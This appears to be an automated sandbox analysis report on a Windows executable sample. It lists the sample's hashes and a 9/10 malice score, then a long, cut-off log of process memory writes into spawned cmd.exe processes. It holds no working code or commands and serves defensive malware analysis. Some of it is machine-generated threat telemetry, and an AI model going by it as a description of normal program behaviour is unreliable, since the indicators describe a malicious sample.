Analysis
-
max time kernel
15s -
max time network
45s -
platform
windows7_x64 -
resource
win7 -
submitted
27-07-2020 06:50
Static task
static1
Behavioral task
behavioral1
Sample
D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
D4D32E7583B3FD8363DED73C91ED3D08.bin.exe
-
Size
52KB
-
MD5
d4d32e7583b3fd8363ded73c91ed3d08
-
SHA1
4079602dce0fb495ed0ec97c5aea5988127fb50c
-
SHA256
2b37a372626063afce9e08199342a41bbe4183b0d5ba7864ff61eb6e6f7c4fdf
-
SHA512
e1ba8e27a19933f15e13ae310920bb74051b5dbe7d3408d8d5aad5f1b80ca7e2ac45d288115c357c9ffcf72a4d2ea29db513a591d64874d972b60962d746aadf
Score
9/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 588 IoCs
description pid Process procid_target PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 25 PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 25 PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 25 PID 1320 wrote to memory of 1440 1320 cmd.exe 27 PID 1320 wrote to memory of 1440 1320 cmd.exe 27 PID 1320 wrote to memory of 1440 1320 cmd.exe 27 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 31 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 31 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 31 PID 1832 wrote to memory of 1260 1832 cmd.exe 33 PID 1832 wrote to memory of 1260 1832 cmd.exe 33 PID 1832 wrote to memory of 1260 1832 cmd.exe 33 PID 1064 wrote to memory of 1852 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 34 PID 1064 wrote to memory of 1852 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 34 PID 1064 wrote to memory of 1852 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 34 PID 1852 wrote to memory of 1648 1852 cmd.exe 36 PID 1852 wrote to memory of 1648 1852 cmd.exe 36 PID 1852 wrote to memory of 1648 1852 cmd.exe 36 PID 1064 wrote to memory of 1596 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 37 PID 1064 wrote to memory of 1596 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 37 PID 1064 wrote to memory of 1596 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 37 PID 1596 wrote to memory of 1588 1596 cmd.exe 39 PID 1596 wrote to memory of 1588 1596 cmd.exe 39 PID 1596 wrote to memory of 1588 1596 cmd.exe 39 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 40 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 40 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 40 PID 1560 wrote to memory of 1876 1560 cmd.exe 42 PID 1560 wrote to memory of 1876 1560 cmd.exe 42 PID 1560 wrote to memory of 1876 1560 cmd.exe 42 PID 1064 wrote to memory of 1900 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 43 PID 1064 wrote to memory of 1900 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 43 PID 1064 wrote to memory of 1900 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 43 PID 1900 wrote to memory of 1964 1900 cmd.exe 45 PID 1900 wrote to memory of 1964 1900 cmd.exe 45 PID 1900 wrote to memory of 1964 1900 cmd.exe 45 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 46 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 46 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 46 PID 1944 wrote to memory of 2000 1944 cmd.exe 48 PID 1944 wrote to memory of 2000 1944 cmd.exe 48 PID 1944 wrote to memory of 2000 1944 cmd.exe 48 PID 1064 wrote to memory of 2036 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 49 PID 1064 wrote to memory of 2036 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 49 PID 1064 wrote to memory of 2036 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 49 PID 2036 wrote to memory of 984 2036 cmd.exe 51 PID 2036 wrote to memory of 984 2036 cmd.exe 51 PID 2036 wrote to memory of 984 2036 cmd.exe 51 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 52 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 52 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 52 PID 836 wrote to memory of 1572 836 cmd.exe 54 PID 836 wrote to memory of 1572 836 cmd.exe 54 PID 836 wrote to memory of 1572 836 cmd.exe 54 PID 1064 wrote to memory of 1544 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 55 PID 1064 wrote to memory of 1544 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 55 PID 1064 wrote to memory of 1544 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 55 PID 1544 wrote to memory of 1712 1544 cmd.exe 57 PID 1544 wrote to memory of 1712 1544 cmd.exe 57 PID 1544 wrote to memory of 1712 1544 cmd.exe 57 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 58 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 58 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 58 PID 220 wrote to memory of 1828 220 cmd.exe 60 PID 220 wrote to memory of 1828 220 cmd.exe 60 PID 220 wrote to memory of 1828 220 cmd.exe 60 PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 61 PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 61 PID 1064 wrote to memory of 1320 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 61 PID 1320 wrote to memory of 1836 1320 cmd.exe 63 PID 1320 wrote to memory of 1836 1320 cmd.exe 63 PID 1320 wrote to memory of 1836 1320 cmd.exe 63 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 64 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 64 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 64 PID 1392 wrote to memory of 1600 1392 cmd.exe 66 PID 1392 wrote to memory of 1600 1392 cmd.exe 66 PID 1392 wrote to memory of 1600 1392 cmd.exe 66 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 67 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 67 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 67 PID 1672 wrote to memory of 1644 1672 cmd.exe 69 PID 1672 wrote to memory of 1644 1672 cmd.exe 69 PID 1672 wrote to memory of 1644 1672 cmd.exe 69 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 70 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 70 PID 1064 wrote to memory of 1560 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 70 PID 1560 wrote to memory of 1928 1560 cmd.exe 72 PID 1560 wrote to memory of 1928 1560 cmd.exe 72 PID 1560 wrote to memory of 1928 1560 cmd.exe 72 PID 1064 wrote to memory of 1860 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 73 PID 1064 wrote to memory of 1860 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 73 PID 1064 wrote to memory of 1860 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 73 PID 1860 wrote to memory of 1040 1860 cmd.exe 75 PID 1860 wrote to memory of 1040 1860 cmd.exe 75 PID 1860 wrote to memory of 1040 1860 cmd.exe 75 PID 1064 wrote to memory of 1984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 76 PID 1064 wrote to memory of 1984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 76 PID 1064 wrote to memory of 1984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 76 PID 1984 wrote to memory of 2028 1984 cmd.exe 78 PID 1984 wrote to memory of 2028 1984 cmd.exe 78 PID 1984 wrote to memory of 2028 1984 cmd.exe 78 PID 1064 wrote to memory of 1504 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 79 PID 1064 wrote to memory of 1504 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 79 PID 1064 wrote to memory of 1504 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 79 PID 1504 wrote to memory of 1116 1504 cmd.exe 81 PID 1504 wrote to memory of 1116 1504 cmd.exe 81 PID 1504 wrote to memory of 1116 1504 cmd.exe 81 PID 1064 wrote to memory of 1512 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 82 PID 1064 wrote to memory of 1512 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 82 PID 1064 wrote to memory of 1512 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 82 PID 1512 wrote to memory of 204 1512 cmd.exe 84 PID 1512 wrote to memory of 204 1512 cmd.exe 84 PID 1512 wrote to memory of 204 1512 cmd.exe 84 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 85 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 85 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 85 PID 236 wrote to memory of 1476 236 cmd.exe 87 PID 236 wrote to memory of 1476 236 cmd.exe 87 PID 236 wrote to memory of 1476 236 cmd.exe 87 PID 1064 wrote to memory of 1356 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 88 PID 1064 wrote to memory of 1356 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 88 PID 1064 wrote to memory of 1356 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 88 PID 1356 wrote to memory of 1256 1356 cmd.exe 90 PID 1356 wrote to memory of 1256 1356 cmd.exe 90 PID 1356 wrote to memory of 1256 1356 cmd.exe 90 PID 1064 wrote to memory of 1604 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 91 PID 1064 wrote to memory of 1604 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 91 PID 1064 wrote to memory of 1604 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 91 PID 1604 wrote to memory of 1660 1604 cmd.exe 93 PID 1604 wrote to memory of 1660 1604 cmd.exe 93 PID 1604 wrote to memory of 1660 1604 cmd.exe 93 PID 1064 wrote to memory of 1652 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 94 PID 1064 wrote to memory of 1652 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 94 PID 1064 wrote to memory of 1652 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 94 PID 1652 wrote to memory of 1884 1652 cmd.exe 96 PID 1652 wrote to memory of 1884 1652 cmd.exe 96 PID 1652 wrote to memory of 1884 1652 cmd.exe 96 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 97 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 97 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 97 PID 1868 wrote to memory of 1948 1868 cmd.exe 99 PID 1868 wrote to memory of 1948 1868 cmd.exe 99 PID 1868 wrote to memory of 1948 1868 cmd.exe 99 PID 1064 wrote to memory of 1972 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 100 PID 1064 wrote to memory of 1972 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 100 PID 1064 wrote to memory of 1972 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 100 PID 1972 wrote to memory of 1944 1972 cmd.exe 102 PID 1972 wrote to memory of 1944 1972 cmd.exe 102 PID 1972 wrote to memory of 1944 1972 cmd.exe 102 PID 1064 wrote to memory of 2012 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 103 PID 1064 wrote to memory of 2012 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 103 PID 1064 wrote to memory of 2012 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 103 PID 2012 wrote to memory of 1988 2012 cmd.exe 105 PID 2012 wrote to memory of 1988 2012 cmd.exe 105 PID 2012 wrote to memory of 1988 2012 cmd.exe 105 PID 1064 wrote to memory of 1436 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 106 PID 1064 wrote to memory of 1436 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 106 PID 1064 wrote to memory of 1436 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 106 PID 1436 wrote to memory of 836 1436 cmd.exe 108 PID 1436 wrote to memory of 836 1436 cmd.exe 108 PID 1436 wrote to memory of 836 1436 cmd.exe 108 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 109 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 109 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 109 PID 208 wrote to memory of 1696 208 cmd.exe 111 PID 208 wrote to memory of 1696 208 cmd.exe 111 PID 208 wrote to memory of 1696 208 cmd.exe 111 PID 1064 wrote to memory of 520 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 112 PID 1064 wrote to memory of 520 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 112 PID 1064 wrote to memory of 520 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 112 PID 520 wrote to memory of 224 520 cmd.exe 114 PID 520 wrote to memory of 224 520 cmd.exe 114 PID 520 wrote to memory of 224 520 cmd.exe 114 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 115 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 115 PID 1064 wrote to memory of 1832 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 115 PID 1832 wrote to memory of 1320 1832 cmd.exe 117 PID 1832 wrote to memory of 1320 1832 cmd.exe 117 PID 1832 wrote to memory of 1320 1832 cmd.exe 117 PID 1064 wrote to memory of 1656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 118 PID 1064 wrote to memory of 1656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 118 PID 1064 wrote to memory of 1656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 118 PID 1656 wrote to memory of 1608 1656 cmd.exe 120 PID 1656 wrote to memory of 1608 1656 cmd.exe 120 PID 1656 wrote to memory of 1608 1656 cmd.exe 120 PID 1064 wrote to memory of 1876 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 121 PID 1064 wrote to memory of 1876 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 121 PID 1064 wrote to memory of 1876 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 121 PID 1876 wrote to memory of 1912 1876 cmd.exe 123 PID 1876 wrote to memory of 1912 1876 cmd.exe 123 PID 1876 wrote to memory of 1912 1876 cmd.exe 123 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 124 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 124 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 124 PID 1636 wrote to memory of 536 1636 cmd.exe 126 PID 1636 wrote to memory of 536 1636 cmd.exe 126 PID 1636 wrote to memory of 536 1636 cmd.exe 126 PID 1064 wrote to memory of 1948 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 127 PID 1064 wrote to memory of 1948 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 127 PID 1064 wrote to memory of 1948 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 127 PID 1948 wrote to memory of 284 1948 cmd.exe 129 PID 1948 wrote to memory of 284 1948 cmd.exe 129 PID 1948 wrote to memory of 284 1948 cmd.exe 129 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 130 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 130 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 130 PID 1944 wrote to memory of 2032 1944 cmd.exe 132 PID 1944 wrote to memory of 2032 1944 cmd.exe 132 PID 1944 wrote to memory of 2032 1944 cmd.exe 132 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 133 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 133 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 133 PID 1988 wrote to memory of 1508 1988 cmd.exe 135 PID 1988 wrote to memory of 1508 1988 cmd.exe 135 PID 1988 wrote to memory of 1508 1988 cmd.exe 135 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 136 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 136 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 136 PID 836 wrote to memory of 1536 836 cmd.exe 138 PID 836 wrote to memory of 1536 836 cmd.exe 138 PID 836 wrote to memory of 1536 836 cmd.exe 138 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 139 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 139 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 139 PID 1720 wrote to memory of 1828 1720 cmd.exe 141 PID 1720 wrote to memory of 1828 1720 cmd.exe 141 PID 1720 wrote to memory of 1828 1720 cmd.exe 141 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 142 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 142 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 142 PID 220 wrote to memory of 1836 220 cmd.exe 144 PID 220 wrote to memory of 1836 220 cmd.exe 144 PID 220 wrote to memory of 1836 220 cmd.exe 144 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 145 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 145 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 145 PID 1808 wrote to memory of 1600 1808 cmd.exe 147 PID 1808 wrote to memory of 1600 1808 cmd.exe 147 PID 1808 wrote to memory of 1600 1808 cmd.exe 147 PID 1064 wrote to memory of 528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 148 PID 1064 wrote to memory of 528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 148 PID 1064 wrote to memory of 528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 148 PID 528 wrote to memory of 1764 528 cmd.exe 150 PID 528 wrote to memory of 1764 528 cmd.exe 150 PID 528 wrote to memory of 1764 528 cmd.exe 150 PID 1064 wrote to memory of 1564 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 151 PID 1064 wrote to memory of 1564 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 151 PID 1064 wrote to memory of 1564 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 151 PID 1564 wrote to memory of 1664 1564 cmd.exe 153 PID 1564 wrote to memory of 1664 1564 cmd.exe 153 PID 1564 wrote to memory of 1664 1564 cmd.exe 153 PID 1064 wrote to memory of 468 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 154 PID 1064 wrote to memory of 468 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 154 PID 1064 wrote to memory of 468 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 154 PID 468 wrote to memory of 1940 468 cmd.exe 156 PID 468 wrote to memory of 1940 468 cmd.exe 156 PID 468 wrote to memory of 1940 468 cmd.exe 156 PID 1064 wrote to memory of 1880 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 157 PID 1064 wrote to memory of 1880 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 157 PID 1064 wrote to memory of 1880 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 157 PID 1880 wrote to memory of 1868 1880 cmd.exe 159 PID 1880 wrote to memory of 1868 1880 cmd.exe 159 PID 1880 wrote to memory of 1868 1880 cmd.exe 159 PID 1064 wrote to memory of 1932 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 160 PID 1064 wrote to memory of 1932 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 160 PID 1064 wrote to memory of 1932 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 160 PID 1932 wrote to memory of 1952 1932 cmd.exe 162 PID 1932 wrote to memory of 1952 1932 cmd.exe 162 PID 1932 wrote to memory of 1952 1932 cmd.exe 162 PID 1064 wrote to memory of 2020 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 163 PID 1064 wrote to memory of 2020 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 163 PID 1064 wrote to memory of 2020 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 163 PID 2020 wrote to memory of 1944 2020 cmd.exe 165 PID 2020 wrote to memory of 1944 2020 cmd.exe 165 PID 2020 wrote to memory of 1944 2020 cmd.exe 165 PID 1064 wrote to memory of 1424 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 166 PID 1064 wrote to memory of 1424 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 166 PID 1064 wrote to memory of 1424 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 166 PID 1424 wrote to memory of 1508 1424 cmd.exe 168 PID 1424 wrote to memory of 1508 1424 cmd.exe 168 PID 1424 wrote to memory of 1508 1424 cmd.exe 168 PID 1064 wrote to memory of 1312 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 169 PID 1064 wrote to memory of 1312 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 169 PID 1064 wrote to memory of 1312 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 169 PID 1312 wrote to memory of 1536 1312 cmd.exe 171 PID 1312 wrote to memory of 1536 1312 cmd.exe 171 PID 1312 wrote to memory of 1536 1312 cmd.exe 171 PID 1064 wrote to memory of 1524 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 172 PID 1064 wrote to memory of 1524 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 172 PID 1064 wrote to memory of 1524 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 172 PID 1524 wrote to memory of 236 1524 cmd.exe 174 PID 1524 wrote to memory of 236 1524 cmd.exe 174 PID 1524 wrote to memory of 236 1524 cmd.exe 174 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 175 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 175 PID 1064 wrote to memory of 208 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 175 PID 208 wrote to memory of 1256 208 cmd.exe 177 PID 208 wrote to memory of 1256 208 cmd.exe 177 PID 208 wrote to memory of 1256 208 cmd.exe 177 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 178 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 178 PID 1064 wrote to memory of 220 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 178 PID 220 wrote to memory of 432 220 cmd.exe 180 PID 220 wrote to memory of 432 220 cmd.exe 180 PID 220 wrote to memory of 432 220 cmd.exe 180 PID 1064 wrote to memory of 1648 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 181 PID 1064 wrote to memory of 1648 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 181 PID 1064 wrote to memory of 1648 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 181 PID 1648 wrote to memory of 1660 1648 cmd.exe 183 PID 1648 wrote to memory of 1660 1648 cmd.exe 183 PID 1648 wrote to memory of 1660 1648 cmd.exe 183 PID 1064 wrote to memory of 656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 184 PID 1064 wrote to memory of 656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 184 PID 1064 wrote to memory of 656 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 184 PID 656 wrote to memory of 1564 656 cmd.exe 186 PID 656 wrote to memory of 1564 656 cmd.exe 186 PID 656 wrote to memory of 1564 656 cmd.exe 186 PID 1064 wrote to memory of 1940 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 187 PID 1064 wrote to memory of 1940 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 187 PID 1064 wrote to memory of 1940 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 187 PID 1940 wrote to memory of 1636 1940 cmd.exe 189 PID 1940 wrote to memory of 1636 1940 cmd.exe 189 PID 1940 wrote to memory of 1636 1940 cmd.exe 189 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 190 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 190 PID 1064 wrote to memory of 1868 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 190 PID 1868 wrote to memory of 1956 1868 cmd.exe 192 PID 1868 wrote to memory of 1956 1868 cmd.exe 192 PID 1868 wrote to memory of 1956 1868 cmd.exe 192 PID 1064 wrote to memory of 1952 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 193 PID 1064 wrote to memory of 1952 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 193 PID 1064 wrote to memory of 1952 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 193 PID 1952 wrote to memory of 2032 1952 cmd.exe 195 PID 1952 wrote to memory of 2032 1952 cmd.exe 195 PID 1952 wrote to memory of 2032 1952 cmd.exe 195 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 196 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 196 PID 1064 wrote to memory of 1944 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 196 PID 1944 wrote to memory of 212 1944 cmd.exe 198 PID 1944 wrote to memory of 212 1944 cmd.exe 198 PID 1944 wrote to memory of 212 1944 cmd.exe 198 PID 1064 wrote to memory of 1508 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 199 PID 1064 wrote to memory of 1508 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 199 PID 1064 wrote to memory of 1508 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 199 PID 1508 wrote to memory of 1396 1508 cmd.exe 201 PID 1508 wrote to memory of 1396 1508 cmd.exe 201 PID 1508 wrote to memory of 1396 1508 cmd.exe 201 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 202 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 202 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 202 PID 1536 wrote to memory of 1476 1536 cmd.exe 204 PID 1536 wrote to memory of 1476 1536 cmd.exe 204 PID 1536 wrote to memory of 1476 1536 cmd.exe 204 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 205 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 205 PID 1064 wrote to memory of 236 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 205 PID 236 wrote to memory of 824 236 cmd.exe 207 PID 236 wrote to memory of 824 236 cmd.exe 207 PID 236 wrote to memory of 824 236 cmd.exe 207 PID 1064 wrote to memory of 1256 1064 